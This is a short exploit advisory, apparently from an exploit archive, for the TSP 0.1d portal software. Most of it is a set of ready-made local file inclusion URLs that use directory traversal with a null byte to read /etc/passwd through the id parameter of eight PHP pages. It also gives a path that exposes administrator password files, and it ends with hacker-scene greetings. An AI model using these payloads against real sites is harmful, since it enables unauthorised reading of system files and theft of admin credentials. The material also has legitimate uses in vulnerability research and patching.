id: 11762
date: 04/13/2010
title: TSP 0.1d Multiple File Inc Vulnerability / Admin Credentials Disclosure
author: GLOBUS
cves: 

===========================================================================
TSP 0.1d Multiple File Include Vulnerability / Admin Credentials Disclosure
===========================================================================

#########################################################################
# Exploit Title:         TSP 0.1d Multiple File Include Vulnerability / Admin Credentials Disclosure
#
# Software               Tekstowy System Portalowy 0.1d
# Date:                  2010-04-13
# Author:                GLOBUS
# Software Link:         http://www.tsp.witka.net/
# Version:               0.1d 
# category:              LFI, Admin Credentials Disclosure
#########################################################################

magic_quotes_gpc = Off

[LFI]
http://localhost/tsp/download.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/arty.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/autorzy.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/forum.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/homepage.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/index.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/katalog.php?id=../../../../../../../../../../../../../../../../etc/passwd%00
http://localhost/tsp/ksiega.php?id=../../../../../../../../../../../../../../../../etc/passwd%00


[Admin Credentials Disclosure]
http://localhost/tsp/admins/[ADMIN_NAME.pas


Greetz: hds, Neo, pok3, .xXx., j4ck, Kopaczka, revel004



#  0day.today [2023-03-25]  #